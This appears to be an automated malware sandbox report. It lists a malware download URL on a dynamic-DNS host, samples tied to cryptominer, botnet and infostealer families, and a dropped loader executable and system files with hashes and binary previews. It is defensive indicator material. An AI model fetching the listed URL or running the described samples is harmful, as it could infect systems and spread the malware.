• http://khalidhost.loseyourip.com:777/dddd.mp4 (Unknown), context: 207.32.217.25
• http://khalidhost.loseyourip.com:777/dddd.mp4 (Unknown), context: 207.32.217.25

No context

Match: C:\Windows\Temp\gyqerfjfsbie.sys
• SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe (Xmrig)
• Step 3 - Setup_Install.exe (Xmrig)
• SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exe (Xmrig)
• eqkh9g37Yb.exe (Xmrig)
• bBcZoComLl.exe (Phorpiex, Xmrig)
• file.exe (Phorpiex, Xmrig)
• dgiX55cHyU.exe (Phorpiex, Xmrig)
• gaber_mnr.ps1 (Metasploit, Xmrig)
• w0QdNGUNtd.exe (RedLine)
• SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe (Xmrig)
                                                      Process:C:\Users\user\Desktop\loader.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5502728
                                                      Entropy (8bit):6.538154728899747
                                                      Encrypted:false
                                                      SSDEEP:98304:wTjsUxLm7HrkZkwsrK8TrIVng9Hxw+4lJZlU0SY8j/42ULZKGDeSoMjWHpNXBN6:MjhWrkZkXzTrp9Hx8JZ9SY8zCw3SnjOo
                                                      MD5:CDABDC02374167CCD4938E9FE8C31789
                                                      SHA1:59028BD5DA928A0AADF157C39AC2C9281DCC881D
                                                      SHA-256:9161BE21746469B9B3C653B81D7CA6639927E89ECE780A4682A2059BA30E2793
                                                      SHA-512:7E823F4BC54E96E1B4B3972068B1495426ACB145BD9DDBFC7959FEFCA957D874DB844A39BFD6225A97DB31027ED226301F767E4D5CE708C8DA4AAD4E7BA11F61
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........,S.....@..........@.............................PT...........`.....................................................<....0T.P.....T.......S..+...@T.x...............................(.......8...............x............................text...&........................... ..`.rdata...<.......>..................@..@.data...H.S.......R.................@....pdata........T.......S.............@..@.00cfg........T.......S.............@..@.tls......... T.......S.............@....rsrc...P....0T.......S.............@..@.reloc..x....@T.......S.............@..B........................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\lsass.exe
                                                      File Type:very short file (no magic)
                                                      Category:modified
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                      Malicious:false
                                                      Preview:.
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllultnxj:NllU
                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                      Malicious:false
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):4680
                                                      Entropy (8bit):3.71133572297434
                                                      Encrypted:false
                                                      SSDEEP:96:pYMguQII4iQm6h4aGdinipV9ll7UY5HAmzQ+:9A4zj/xne7HO+
                                                      MD5:B64154C7F9DE0F3E8C8F249DA663EC40
                                                      SHA1:EA38D4704DC18E444DBB2A23833A456089ECF013
                                                      SHA-256:3B685B81A7A9EC5D428DD97B381B41A63A2BE54733E9CBCF8D971BFB7DE77AB5
                                                      SHA-512:21338FD6D7DE8C73BE2226FECEA3E4F875503F444AE9D3A42555E6073B9386673F6F5B04412CA63AB541D37112F6ABF60447F7147A7B30FC6A2E5389CCF06F2C
                                                      Malicious:false
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1079756391222424
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul0ll/lZ:NllUcl/
                                                      MD5:C296B0C35354DD06C955237718AAC40C
                                                      SHA1:DCE0F8D35974AA0AB49353CD949F2DD8F54B25FF
                                                      SHA-256:A6D63E2AE04A32B3609B7886FBF4D1E0D37B6293C1E8CF6415FED4B76001FC8D
                                                      SHA-512:1AEB19BF2D0C32B0E7ED32614AB1C0A263629D1D0967EAA4B6BFA6FCD81BCE0D0DCCCD596427880FCBC34D1911835FBD7364AE4002EDDCDA4BF63C66F42B7F75
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3888
                                                      Entropy (8bit):3.649579905030079
                                                      Encrypted:false
                                                      SSDEEP:48:M3zrP+sXCrPwfFRVEfWb3/OoNM/yTL3WTeGeHSqdrSDFDSLI:WRCrup/vOo+SLGT/ujoFeI
                                                      MD5:F01F813838EE8E6AA01A1322AFC13CBE
                                                      SHA1:908704B300494EB9A6ADC351C2B1328762C462F4
                                                      SHA-256:D7D923744FADA67FA424D8DD0D5CD5388DDD73755B958828874A9A6DF17B4086
                                                      SHA-512:27CB868A04BB85934F8D317F4A1499B826EFFDB9AFC066F0667364D8EA7A89DC3E559113BD8414419C9ACAE7EE8EA9850C4DCEC162962583F1F73660B927F22D
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.1669120609196026
                                                      Encrypted:false
                                                      SSDEEP:384:Ghe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842R:GVUHiapX7xadptrDT9W84y
                                                      MD5:C5116286214EE64F479940A11AE6AE06
                                                      SHA1:5EF7A5571A01449564964F77979385AB44E7AE4E
                                                      SHA-256:E457633148D325083196F0E05427D42DCD6BA60215863EE454EE54B7501A6C6F
                                                      SHA-512:128B8BB01FAB32785215CB408B8C40AC74DA153C4BD50369FFF727A8A1D9B9E8011852F85EC2BBC1866E70CC9DFAE36048B25B738496B50D4736DA656592F5F3
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.010692427789071
                                                      Encrypted:false
                                                      SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                      MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                      SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                      SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                      SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):66960
                                                      Entropy (8bit):4.165323380336998
                                                      Encrypted:false
                                                      SSDEEP:384:CVMV6hfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgVL:Qhfyuct
                                                      MD5:06A420602500EF36F0F68D5F9AB66E81
                                                      SHA1:CB55D076F1561BC470F039A2757146AE5B51E6A4
                                                      SHA-256:A26FB6BF26226E65C50903D968E7B901F8F7D3065B8B8CAC4AD541060EF28C8A
                                                      SHA-512:DC9AABB6BA8684F6130E42B75F0FC4D257CFF7E60D5C24A76E316EB473024D4F6CF0F043457554CE66CE0E95EB67883F967B4BD372926FDF83503FA05C543960
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.428039879966584
                                                      Encrypted:false
                                                      SSDEEP:384:hhTm5mcumNQYmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:hqcD6CL49mVpgwQFQ
                                                      MD5:F370E48DC8A79E8B25AABD90C8792FE9
                                                      SHA1:8E89951783F0E67BB9E56668F2E4733ED89B6509
                                                      SHA-256:32A383B047F8E04DCD1A2179C2DCA8206D75F50359496430A08ECB18C140DAF7
                                                      SHA-512:987DA0ED4E711F101D9CC77149AD8D461228EC8023F507C9A653A56010E27D7ABEFA7A28214F3A412769A586E8398D1FCB97501FEFAE9B25959004EFEC622E91
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.3524594952362487
                                                      Encrypted:false
                                                      SSDEEP:48:MPWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyVdHLP7jMzckH58ykHc:ONVaO8sMa3Z85ZMLQrjju3Z85Zu
                                                      MD5:42D893E89DF7DD4514ECAEBF1FC24AFC
                                                      SHA1:09C050EB0F1B945303A963F5190E79D1BD7A476F
                                                      SHA-256:D0AAD2D2D36666A05E81BA2DF16638EFCBA01936B0B09D158A7A6FC806B2CB8D
                                                      SHA-512:E7861511FE63D1E3741E8FA74B38955304B71DB5AD20765192C52E151CF095C9479526F2ED8264F9ECEA8552DBDC2ABBC0650131AA076E72F71CDC0AA53C7B9E
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.014860518194814
                                                      Encrypted:false
                                                      SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                      MD5:4FB8E2CF8B3F20534836684947962DC2
                                                      SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                      SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                      SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.15655690871689
                                                      Encrypted:false
                                                      SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                      MD5:2DE60575CB719BF51FAB8A63F696B052
                                                      SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                      SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                      SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):101120
                                                      Entropy (8bit):2.6687194151305405
                                                      Encrypted:false
                                                      SSDEEP:384:kosKxoEoaApoj+ylXMoefoay0oNoayBowoayboqoayhhdo69CcoTorNorWorbvoI:ziDCYFGDCYFt
                                                      MD5:A8144A83C7195965ACF9978B38BD2D30
                                                      SHA1:F1A911B761BCBF3A0EDCA021064F7736E6432ED2
                                                      SHA-256:93E817A4D1F70BEA5C31F8E9FE943A8341237EDDB20376B8F4E6BF0F524290AE
                                                      SHA-512:7CFCAAC2358D7B9A836819B4889EF87F6F4E865EE196955CADF98F175D24CDDF1E8DAD930C58C465E5F50B0706B1D7B1BA9229E078484769B398F13A195D7ABA
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8524226245257144
                                                      Encrypted:false
                                                      SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                      MD5:B8E105CC52B7107E2757421373CBA144
                                                      SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                      SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                      SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8432997252442703
                                                      Encrypted:false
                                                      SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                      MD5:39EE3557626C7F112A88A4DE12E904C1
                                                      SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                      SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                      SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.9223892466691472
                                                      Encrypted:false
                                                      SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                      MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                      SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                      SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                      SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                      Malicious:false
                                                      Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.838106263184782
                                                      Encrypted:false
                                                      SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                      MD5:A2D41740C1BAF781019F282E37288DDF
                                                      SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                      SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                      SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                      Malicious:false
                                                      Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.634418630947688
                                                      Encrypted:false
                                                      SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                      MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                      SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                      SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                      SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                      Malicious:false
                                                      Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.0646587531847893
                                                      Encrypted:false
                                                      SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                      MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                      SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                      SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                      SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                      Malicious:false
                                                      Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4364303862010575
                                                      Encrypted:false
                                                      SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                      MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                      SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                      SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                      SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                      Malicious:false
                                                      Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.0631557320109892
                                                      Encrypted:false
                                                      SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                      MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                      SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                      SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                      SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                      Malicious:false
                                                      Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.4467272005363894
                                                      Encrypted:false
                                                      SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                      MD5:155681C222D825199B738E8DEC707DC8
                                                      SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                      SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                      SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                      Malicious:false
                                                      Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.156155224835584
                                                      Encrypted:false
                                                      SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                      MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                      SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                      SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                      SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                      Malicious:false
                                                      Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9197999988543422
                                                      Encrypted:false
                                                      SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                      MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                      SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                      SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                      SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                      Malicious:false
                                                      Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                      Category:dropped
                                                      Size (bytes):76040
                                                      Entropy (8bit):4.551581036940398
                                                      Encrypted:false
